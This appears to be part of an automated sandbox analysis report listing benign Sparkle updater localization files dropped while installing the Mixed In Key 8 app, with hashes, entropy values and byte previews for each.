Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".O. .%.1.$.@. .%.2.$.@. .f.o.i. .t.r.a.n.s.f.e.r.i.d.o. .e. .e.s.t... .p.r.o.n.t.o. .a. .i.n.s.t.a.l.a.r.!. .G.o.s.t.a.r.i.a. .d.e. .o. .f.a.z.e.r. .a.g.o.r.a. .e. .r.e.i.n.i.c.i.a.r. .o. .%.1.$.@. .p.o.s.t.e.r.i.o.r.m.e.n.t.e.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".O. .%.1.$.@. .n...o. .p.o.d.e. .s.e.r. .a.c.t.u.a.l.i.z.a.d.o. .q.u.a.n.d.o. .e.s.t.i.v.e.r. .a. .s.e.r. .e.x.e.c.u.t.a.d.o. .a. .p.a.r.t.i.r. .d.e. .u.m. .v.o.l.u.m.e. .a.p.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_jS4NXR Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15929
Entropy (8bit):	6.773954987143327
Encrypted:	false
SSDEEP:	384:+bg8fE0NeEYNg7ns2OF8WJt+GDBcRrGefVcIFVslq1X:Gg8veEYyDS8WJ8GORrGOFVsle
MD5:	92F49494404B520461E01AD083F4BE8D
SHA1:	533BDBDCED059078E165626BFC196EE5B370C56F
SHA-256:	02C5CA9C182A43C235F89AD585B99AFA628E68F57DAAAA6C95E91E7D5D5F22CB
SHA-512:	846F89A0688F9E8B85085D1F03B552CDB1B6A7E32F630DEA339C65FE55888ECEAFF72C6EEF1A7A4787C3615320F83619BDFF4684C585B3B37342A1EA3F897C6A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.?.@.H.L.M.V.W.^._.c.x.\|...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_nhY82q Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12175
Entropy (8bit):	6.719807080046224
Encrypted:	false
SSDEEP:	192:zK1WxXwQOL8jE0lTjeEYNMtKwC/4Iv4nes7sK5wNCZ/scX/cAQZPBgox:zKgxXwQw8jE0NeEYNg7C/4Iv4neWsfYI
MD5:	CAC1492EC2FD38D882CB50370098E0D0
SHA1:	4C7001089459FB36FA1285FCD6E73282AA947C4B
SHA-256:	B468C1700F47B311C9E37C627C154AFC1CCF82A95ACE2161FEA81538E3BC232A
SHA-512:	0D3DCB8F4B52C38BE9A1767DD3AA93E2934BF2110C807B715A772165A7817E064CFF573974B216498010E5590DE2BEE3918B48DA3A37F89C5BB859C078210E63
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_I0c7IW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12198
Entropy (8bit):	6.7150010140379885
Encrypted:	false
SSDEEP:	192:zK1WxXoQOLgjE0lTjeEYNMtKwC/4Irrk4Cs7sK5wNCZ/scX/cAQZPB+e2qPM:zKgxXoQwgjE0NeEYNg7C/4IrrkHWsfY9
MD5:	1CDC030FBF7CFF8E0D94994EFA106B73
SHA1:	484D8BB38566D35C6BE3C5A177F39209F76A3E76
SHA-256:	604F44D2C72F0CB3AF6C1F4271C4132A36C83939BEDF741434BEB87B12C9AAF4
SHA-512:	498ACAE4D2A2909B19E686FC9DC40E1E5A5B6F348955CC0AB50DB7B7AA5B37613C48A1079CF18925DAAD9C94D99D45FA7AC1060242104C0CC85CDA02ED59DA2E
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_RmnWMc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11268
Entropy (8bit):	6.6972741033720675
Encrypted:	false
SSDEEP:	192:Ee1WI1xpDOTaE0lrjeEYNMtKwQN4g4HL3+qJU32dTN3tTdKI4y:Eeg2pDhE0ZeEYNg7QN4NH6qxddRsI4y
MD5:	BE5D7CEFFE1A006CD176CAEB17C87B88
SHA1:	97C42DDCCF81AF65AD4427D45FBEF2A16222629E
SHA-256:	E77647D9B8D49208B1A39C2F2EEEB3739EDD12B5160DF25E5D42D93AAFF1628C
SHA-512:	8B91C82B71655C34C4E80E8190B448003F5C5D03AF991A619D9217FD4E9BBAC9C898259FAF865B97C52E3F1BE17BFA4C5CC919BB5FEB32EBD9208DAB2A7FD4A2
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_ZdbPky Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15662
Entropy (8bit):	6.792781186173288
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFccJtPNLLeqwUtOon7:dgTveEYyDSccJDyeAon7
MD5:	74B96675ADB2428ECB1D967C2A6D7A1B
SHA1:	8707E222E934B14E81FE26E79FD11C018798B772
SHA-256:	5DB66D8561B0D81222E946823F5F7FA4525F4DD486093B08CCF72BAEAA18E219
SHA-512:	3D260019497C3A90C1C45EF807BB0E5D2EDAA57A5A7107CFC2F42F026B448ADE2C77ACAE5D6231224797BB50AA08914784A2CFC52848747B0745C0F46622F9BD
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_bjvwvQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18270
Entropy (8bit):	6.8356926816033505
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+U3NAKAswd17hPDN1lfebP8YU/8oWuSgBPH4iL/k:ZgZDeEYy+KAJRBlfU4/8oBB3/k
MD5:	9587141582A18B29B0157015B963EA5F
SHA1:	9F0B99B24FB2A17478B531B89D6413F120AA78E1
SHA-256:	6B1DFC4DF69423D145634F875C260D69340EC27EF2B1FEFBF5686B66941EA13B
SHA-512:	75DBC826FAC24484110496889B8BA465912C8D6C2C1E9875DF3BBEBBA82DB8E08BA1100638E624409EA29275ADEF36DF24544624AE728C7F9F48653DB1A521A0
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_soEDwr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7826
Entropy (8bit):	3.489210899648447
Encrypted:	false
SSDEEP:	192:MZ+3+RlE4w4AO484uFwnEfFoJZk+6E42H:kM4w4b4849EfFoJZk+6SH
MD5:	840CEA4BC9384DC2E0C8D0B590033D72
SHA1:	1FB3CFD7F3F9E76F0F2C958EFC230EDB696B6129
SHA-256:	25C226E5EABA90C86D05792CE50CDC6394071164B688DAF04B7B601B2DCEA1FD
SHA-512:	022B7A6E9EB17FA8318AEC2CCBB8370B951E83937D03607A4A84D22C1778FB89580DE14EAB3BB42E774EF587B143E2DAB6B007F8CBA29B8ABD921FCAA212123F
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .a. .f.o.s.t. .d.e.s.c...r.c.a.t. ...i. .e.s.t.e. .g.a.t.a. .d.e. .u.t.i.l.i.z.a.r.e.!. .D.o.r.i...i. .s... ...l. .i.n.s.t.a.l.a...i. ...i. .s...-.l. .r.e.l.a.n.s.a...i. .%.1.$.@. .a.c.u.m.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.u. .p.o.a.t.e. .f.i.i. .a.c.t.u.a.l.i.z.a.t... .a.t.u.n.c.i. .c...n.d. .e.s.t.e. .p.o.r.n.i.t... .d.e. .p.e. .u.n. .v.o.l.u.m. .r.e.a.d.-.o.n.l.y. .c.a. .o. .i.m.a.g.i.n.e. .d.i.s.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_8n8iSm Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6714
Entropy (8bit):	4.159280820830355
Encrypted:	false
SSDEEP:	96:M4FSFrt+yPPP3Jiz4Vy49qQGymZxxEMMnJSOrUCYaENV2IaLM27c:MoSFFP3J+xZxxenJSvCYad42w
MD5:	BF65B56028121F8EB189838B247A8A8C
SHA1:	CE4D67DD11821DABF7F8C55E590B0F7D1F99489A
SHA-256:	67A6907E58F0FE4695A108A18EEC7D4CFCB80F602822653AEA51D2A705D3EC4B
SHA-512:	F9CD43DE3DC86EBA199A876ACA66B24F2B4471C7891F94B94D9FE41809AD31A14190AC07AE58157334D26AC5DEE2DA3B77DB7FB9EA50CD99FF8E8215CB6B0D23
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.3.@.C.6.5.=. .8. .3.>.B.>.2. .:. .8.A.?.>.;.L.7.>.2.0.=.8.N.!. .%.>.B.8.B.5. .C.A.B.0.=.>.2.8.B.L. .8. .?.5.@.5.7.0.?.C.A.B.8.B.L. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...>. .2.@.5.<.O. .@.0.1.>.B.K. .%.1.$.@. .A. .B.>.<.0.,. .?.@.5.4.=.0.7.=.0.G.5.=.=.>.3.>. .B.>.;.L.:.>. .4.;.O. .G.B.5.=.8.O.,. .:.0.:. .=.0.?.@.8.<.5.@.,. .>.1.@.0.7.0. .4.8.A.:.0. .8.;.8. .=.0.:.>.?.8.B.5.;.O. .=.0. .>.?.B.8.G.5.A.:.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_IF71My Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18611
Entropy (8bit):	6.833785673574277
Encrypted:	false
SSDEEP:	384:ZgupE0DeEYNg7uH4+53NAKAsif17lsbB1lrbP8YU/8oWuSgBjdyKBg:ZguDeEYyZKAdRoln4/8oBBhBBg
MD5:	7178E928AAC471E0659312F288A3C933
SHA1:	38C6C69B705B11654AF0842930364C0172DD5CFA
SHA-256:	BAC39D612336E64C09D03565C5DDC40C7384504F8C335FD2E18ED5F324D67BD3
SHA-512:	1E80407BE33AE02A733CDF9B9D5809EABBF6B838E64CD44B0FE5EFFBC5E936937CD912021E0CE7703119F28DDDFE2927B7903DBE52A0746BEE30FB7F1067B9B5
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_ovksuW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15963
Entropy (8bit):	6.825380721655024
Encrypted:	false
SSDEEP:	384:yygHfE0NeEYNg7ns2OFHWJtaGD9J+WUV5/FVsAF4z+:jgHveEYyDSHWJEGDUFVsRq
MD5:	DC54057797D75E1842B35446B183000B
SHA1:	CAD5EBAA06A65546474F5CF519694B384DA7ABC4
SHA-256:	BA1DD2CAB56E66253BD95E0482BFB80011E916AA99DE7A7FD018E0B45C477B15
SHA-512:	2DFCF4941C065EBCEAFCBDADAC86330163CC065F24BE01FB8174F5056933A9E134B99B92CFBE8E70DFE7AD002514609D7D786F2314087CD9ACF012495AF2F082
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_xKOUP2 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12243
Entropy (8bit):	6.747548381425468
Encrypted:	false
SSDEEP:	192:zK1WxXdQOLTjE0lTjeEYNMtKwC/4IMlCks7sK5wNCZ/scX/cAQZPTQKK:zKgxXdQwTjE0NeEYNg7C/4IMokWsfYXP
MD5:	EB133FB33300FAE7A7A57A2AEF2570D5
SHA1:	C47F649F705E461E133F5017BEB49DF6141D34FE
SHA-256:	7D2FFFFC4600E02C79221EC86BE57EF75FACF8EF8C0990E6AC6C7395D3C99745
SHA-512:	587018841DC95464089218AD147DFBA25325D5C020E0E7DCF00A569264D066BD167200DC4A45A487BEB962B616A6D7AEE340998C629308170BE88E3CFCCCC6DD
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_3exBp1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12221
Entropy (8bit):	6.708764021486379
Encrypted:	false
SSDEEP:	192:zK1WxXqMQOLDjE0lTjeEYNMtKwC/4Iw4KEs7sK5wNCZ/scX/cAQZPB+rNtl60:zKgxXqMQwDjE0NeEYNg7C/4Iw4KEWsfQ
MD5:	D323E22918AE551483034AE6C5F967BE
SHA1:	606FF2F2949747555E00CF566AE6DD773BD1D06E
SHA-256:	447AD3CB34FC7B3B7DBC8EAF51AE8ED0438B9AE1CB57A61E3F1B16E1A8279CA0
SHA-512:	E1B9A0AA2384E6EDE96580741108DD24687E4F8A7F6703F7D0B020E76000B3EE96F0546B85C9A9D917A0FD6C82EA2A7CB118374E2F85366917F67B6EC61095D3
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_l242yT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18527
Entropy (8bit):	6.789857687787387
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAswd17knpOz1lflbP8YU/8oWuSgBda:ZgZDeEYyZKAJRrlfZ4/8oBBM
MD5:	C09621589C8FF8C52F30649EC9B10DE3
SHA1:	92164070CFDCC991A5E23AA693FF2BFDE0A3F1EC
SHA-256:	75FFD81FEA3A52560C46001AF2FC5E01BD2CF98414694E48EBD22BB357A8FD5C
SHA-512:	922F65C0EF3B56AF15C1CB721E26061BFCDB95A350221A805B434473E014BD971E76524DE47B666495D1B382F9AC1BCC16369216987523D26EF8C3CB34B0BC42
Malicious:	false
